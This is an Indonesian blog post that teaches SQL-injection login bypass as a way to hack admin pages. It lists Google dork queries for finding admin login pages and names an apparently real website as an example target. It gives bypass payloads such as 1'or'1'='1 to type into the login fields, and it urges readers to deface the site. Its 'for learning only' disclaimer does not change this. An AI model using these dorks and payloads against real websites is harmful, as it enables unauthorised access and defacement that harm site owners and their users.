CARA HACK WEBSITE ADMIN DENGAN METODE BASIC SQL INJECTION

CARA HACK WEBSITE ADMIN DENGAN METODE BASIC SQL INJECTION

*penulis tidak bertanggung jawab atas kerusakan yang pembaca perbuat, postingan ini hanya untuk pembelajaran*

Hai sobat blogger semua!!!! Selamat Tahun baru ya….., doa kan blog ini makin maju di Tahun ini, Amin. Pada kesempatan kali ini, saya akan mengajari bagaimana caranya hacking sebuah website admin, namun saya akan membagikan metode yang paling mudah, oke langsung saja ..sikat..

Pertama, anda harus mencari website yang bisa diserang oleh metode sql injection ini. Caranya, kita akan memanfaatkan google dorks.., silahkan masukan kode dibawah ini di kolom search pada google:

Inurl:admin/index.php

Inurl:adminhome.asp

Inurl:login.asp

Inurl:adminlogin.aspx

Inurl:administrator.asp

Inurl:administrator.php

Inurl:adminpage.asp

Dsb, silahkan cari sendiri dork nya untuk admin page :v.

Setelah itu silahkan kunjungi satu persatu web, misalnya saya mendapatkan globaloiljobs.com/admin_login.asp,

Lalu isi admin ID dan password sesuka hati agan, sampai terdapat tulisan invalid admin ID or password atau sebagainya.

Setelah itu masukan code dibawah ini untuk di masukan pada admin ID dan passwordnya

Admin ID: 1'or'1'='1

Password: 1'or'1'='1

Atau yang lain

Admin’ -

or 1=1-

‘ or a=a-

or 0=0 #

Dan tada…..

 

selamat anda sudah bisa jadi Admin dan deface sesuka agan, tapi saya tidak bertanggung jawab lho gan. Hehe :v. oke terimakasih sudah mampir. Mohon maaf jika saya ada kesalahan. Jika ada pertanyaan, kritik, atau saran. Silahkan berkomentar. Oke…see you….

*penulis tidak bertanggung jawab atas kerusakan yang pembaca perbuat, postingan ini hanya untuk pembelajaran*